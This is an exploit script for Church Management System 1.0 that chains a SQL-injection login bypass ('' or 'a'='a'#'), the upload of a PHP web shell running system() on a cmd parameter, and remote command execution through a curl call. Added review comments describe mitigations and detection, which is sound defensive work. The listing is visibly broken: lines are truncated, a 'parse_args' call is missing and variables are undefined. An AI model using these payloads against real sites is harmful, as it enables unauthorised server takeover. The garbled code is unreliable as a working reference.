Monday, July 12, 2021

Church Management System 1.0 Shell Upload / SQL Injection

# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
# Date: 05-07-2021
# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com)
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu)

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import os, sys
import argparse
import optparse
import string

# Print a usage hint unless the script was started with exactly four
# arguments (sys.argv then has five entries: script name, -u, URL, -c, command).
# NOTE(review): the two print lines have lost their indentation on this page,
# and no exit follows the hint in the visible text, so nothing stops
# execution from continuing past this check.
if len(sys.argv)!=5:
print('Usage: -u http://<ip> -c <"command">')
print('ex. python3 -c "ls+-la"')

# Declare the two command-line options: the target base URL and the command
# string. optparse is used here although argparse is also imported.
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url")
parser.add_option('-c', '--cmd', action="store", dest="cmd")

# NOTE(review): `options` is read here but never assigned in the visible
# listing. The `parser.parse_args()` call that would normally produce it
# appears to be missing from the page, so this line raises NameError as shown.
print(options.url, options.cmd)

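def randomGen(size=8, chars=string.ascii_lowercase):
    """Return a random string of ``size`` characters drawn from ``chars``.

    Args:
        size: Number of characters to generate; 0 yields an empty string.
        chars: Non-empty sequence of candidate characters (lowercase ASCII
            letters by default).

    Returns:
        A ``str`` of length ``size``.

    No call to this helper is visible in the listing as published.
    """
    # The body had lost its indentation on the page, which made the def a
    # syntax error; it is restored here without changing the logic.
    # random.choice is not a cryptographic source: the result is an arbitrary
    # label, not an unguessable token.
    return ''.join(random.choice(chars) for _ in range(size))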



# NOTE(review): this part of the listing is incomplete as published. Three
# statements are truncated (the multipart encoder, the session/login line and
# the upload line), and `shellFile`, `urlbase` and `cookie` are never assigned
# in the visible text, so the script does not run as shown. The comments below
# record what each visible step says about the affected application and what
# a defender should fix or monitor.

# Login form fields. The password value is a SQL tautology followed by '#'
# (a comment marker in MySQL). The advisory title calls this an authentication
# bypass, which implies the login query is built by concatenating request
# fields into the SQL text.
# Mitigation: use prepared statements with bound parameters, and verify the
# password against a stored hash in application code, not in the WHERE clause.
payload={"username":"test", "password":"' or 'a'='a'#", "login":""};

# Local intercepting-proxy address for HTTP traffic. In the visible text only
# the upload line passes proxies=proxies; on the login line it is commented out.
proxies = { "http": "http://localhost:8080"}

# Multipart form body with a single "image" field: file name `shellFile`, PHP
# source as the content, and a declared content type of application/x-php.
# An endpoint that stores this as-is is not restricting uploads by extension
# or content.
# Mitigation: allow-list image extensions and verify the content server-side,
# choose the stored file name on the server, and keep uploads outside the web
# root or disable script execution in the uploads directory.
# NOTE(review): the closing "})" of this call is missing from the page.
mp_encoder = MultipartEncoder(fields = {
"image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),

# NOTE(review): truncated line. It looks like a Session creation fused with
# the tail of a login POST that sent `payload` without following redirects;
# the request URL and the call itself are not visible.
session=requests.Session(), payload, allow_redirects=False) #, proxies=proxies)

# Request headers for the upload: a Cookie taken from `cookie` (not defined in
# the visible text) and the multipart content type, including its boundary.
headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type}

# NOTE(review): truncated line. It shows the upload target path /admin_pic.php
# and the tail of a request that sends `mp_encoder` as the body.
# Detection: POSTs to /admin_pic.php whose multipart part has a non-image file
# name or a content type such as application/x-php.
uploadUrl=urlbase+"/admin_pic.php", data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies)

# Requests the uploaded file under /uploads/ with a cmd query parameter.
# Detection: web-server log entries for script files served from /uploads/,
# especially with a cmd= parameter, and newly created non-image files there.
# NOTE(review): the curl command line is built by string concatenation and
# run through os.system, so `urlbase` and `options.cmd` are also interpreted
# by the local shell. A subprocess argument list or the already-imported
# requests library would avoid that.
os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd)

